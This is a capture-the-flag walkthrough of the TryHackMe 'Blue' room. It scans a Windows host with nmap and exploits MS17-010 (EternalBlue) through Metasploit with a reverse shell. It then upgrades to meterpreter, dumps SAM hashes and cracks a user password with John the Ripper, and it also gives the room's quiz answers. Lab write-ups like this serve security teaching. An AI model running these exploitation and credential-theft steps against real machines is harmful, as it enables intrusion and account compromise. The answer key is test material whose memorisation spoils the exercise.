
TryHackMe: Blue
This room is based on a Windows machine on which we need to leverage common misconfigurations (here, an unpatched SMBv1 service).
[Task 1] Recon
Start a nmap scan on the given box:
nmap -sV --script vuln -oN nmap/initial <ip>

We find that ports 135, 139, 445, 3389, 49152, 49153, 49154, 49158, 49160 are open.
The --script vuln option runs every NSE script in the vuln category against the target, so one scan checks for a whole set of known vulnerabilities rather than a single one.

In the script output, smb-vuln-ms17-010 reports the host as VULNERABLE to MS17-010, a remote code execution flaw in the Microsoft SMBv1 server.
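The scan output is what answers both Task 1 questions, so it is worth being able to parse it rather than eyeballing it. The Python below is an added example, not part of the original write-up or of nmap: it reads nmap normal (-oN) output, lists open ports, counts those under a limit, and flags any smb-vuln-* script block whose result line says State: VULNERABLE (a block reading State: NOT VULNERABLE is correctly ignored). The sample report is constructed for this example; the port list matches what the scan above found, while the host address, banners and script block text are illustrative.

```python
import re

# Constructed sample of `nmap -sV --script vuln -oN` output. The open ports match the
# scan in the write-up; the IP, banners and script block are illustrative only.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.10
Host is up (0.050s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_    Risk factor: HIGH
| smb-vuln-ms10-054:
|_  State: NOT VULNERABLE
"""

# "135/tcp   open  msrpc   Microsoft Windows RPC": port, proto, state, service, optional version
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# Start of an NSE script block: "| smb-vuln-ms17-010:" or single-line "|_smb-vuln-...:"
SCRIPT_HEADER = re.compile(r"^\|_?\s*(smb-vuln-[\w-]+):")
# Only an exact "State: VULNERABLE" counts; "NOT VULNERABLE" and "LIKELY VULNERABLE" do not.
VULN_STATE = re.compile(r"State:\s*VULNERABLE\b")


def parse_open_ports(report: str) -> list[int]:
    """Return the port numbers nmap reports as open, in report order."""
    ports = []
    for line in report.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(3) == "open":
            ports.append(int(m.group(1)))
    return ports


def count_ports_below(report: str, limit: int = 1000) -> int:
    """Number of open ports with a port number strictly below `limit`."""
    return sum(1 for p in parse_open_ports(report) if p < limit)


def vulnerable_scripts(report: str) -> list[str]:
    """Names of smb-vuln-* scripts whose block contains 'State: VULNERABLE'."""
    results: dict[str, bool] = {}
    current = None
    for line in report.splitlines():
        header = SCRIPT_HEADER.match(line)
        if header:
            current = header.group(1)
            results.setdefault(current, False)
            # A single-line result may carry the state on the header line itself.
            if VULN_STATE.search(line):
                results[current] = True
            continue
        if current and line.startswith("|") and VULN_STATE.search(line):
            results[current] = True
    return [name for name, vuln in results.items() if vuln]


if __name__ == "__main__":
    print("open ports:", parse_open_ports(SAMPLE_NMAP_OUTPUT))
    print("open ports under 1000:", count_ports_below(SAMPLE_NMAP_OUTPUT))
    print("vulnerable:", vulnerable_scripts(SAMPLE_NMAP_OUTPUT))
```

Feeding it the real nmap/initial file from the scan (open(...).read()) gives the answers to the two questions below without manual counting, and the VULNERABLE check is the same signal a practitioner would key on before reaching for an exploit.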
How many ports are open with a port number under 1000?
3
What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
ms17-010
[Task 2] Gain Access
We start Metasploit and search for the vulnerability that we found during our initial recon.
msfconsole
msf6 > search ms17-010

We find the EternalBlue SMB remote exploit.
EternalBlue (MS17-010) abuses a flaw in how the Windows SMBv1 server handles specially crafted packets: an unauthenticated attacker who can reach port 445 gets remote code execution as SYSTEM, which is why the same bug was used by worms such as WannaCry to spread across networks.
We then select the exploit and show the options we need to set. Note that use 0 picks the first search result, which is only safe when the search returns a single hit; use exploit/windows/smb/ms17_010_eternalblue is unambiguous.
msf6 > use 0
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

We need to set RHOSTS to the target's IP address and LHOST to our own attacking machine's address. On the TryHackMe VPN that is the IP of the tun0 interface, not the address of any other interface, or the reverse shell will never connect back.
set RHOSTS <target-ip>
set LHOST <tun0-ip>
We set the payload to windows/x64/shell/reverse_tcp as the instructions specified.
set payload windows/x64/shell/reverse_tcp
We then start the exploit.
exploit

To check our current access level, we use whoami and we get:
nt authority\system
Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
exploit/windows/smb/ms17_010_eternalblue
Show options and set the one required value. What is the name of this value? (All caps for submission)
RHOSTS
[Task 3] Escalate
Now we background our current shell (Ctrl+Z) and upgrade it to a meterpreter session with the shell_to_meterpreter post module.
msf6 > search shell_to_meterpreter
msf6 > use 0
We show options for the selected post module (it is a post module, not an exploit) and set LHOST and SESSION. sessions -l lists the session number of the shell we just backgrounded.
set LHOST <ip>
set SESSION <session-no.>

We run the module and get a second session, this time a meterpreter one. From now on we interact with that meterpreter session instead of the raw shell.
sessions -i <meterpreter-session-no.>

Now we have a meterpreter session. We confirm we are NT AUTHORITY\SYSTEM with getuid; getsystem, which would otherwise try to elevate, simply confirms it. Even though the session runs as SYSTEM, the process it lives in may not be one we want to stay in, so we list processes with ps and migrate to a stable process that runs as SYSTEM; services.exe is the usual choice. Doing this before the next task also makes sure hashdump has the privileges it needs.


If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
post/multi/manage/shell_to_meterpreter
Select this (use MODULE_PATH). Show options, what option are we required to change?
SESSION
[Task 4] Cracking
We are in an elevated meterpreter shell, so we can use the hashdump command to dump the password hashes stored in the local SAM.
meterpreter > hashdump

We copy Jon's line (in pwdump format, user:RID:LM-hash:NT-hash:::) into a file and crack it with John the Ripper using the rockyou.txt wordlist.
john --format=NT --wordlist=<path-to-rockyou.txt> <hash-file>
Given a pwdump-style line, John picks the LM format by default and would attack the (useless) LM field rather than the NTLM hash, so we have to force --format=NT. John also expects the hashes in a file, not on the command line.

We get the password for the user Jon.
Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
Jon
Copy this password hash to a file and research how to crack it. What is the cracked password?
alqfna22
[Task 5] Find flags!
As we have a meterpreter shell we could search for a file on the system.
We start by changing directory to C:\ (the system root) and find flag1.txt right there.

Since we know the file-name pattern, we can now search the whole filesystem for the remaining flags directly.
meterpreter > search -f flag*txt

We have found all three files on the system and successfully completed the room. The flag locations are key places in a Windows system that we should know: the system root, the directory holding the SAM and other registry hives, and an administrator's personal folders.
flag1? This flag can be found at the system root.
flag{a****************e}
flag2? This flag can be found at the location where passwords are stored within Windows.
flag{s**************************s}
flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.
flag{a*****************************e}
TryHackMe profile: https://tryhackme.com/p/kaneki10007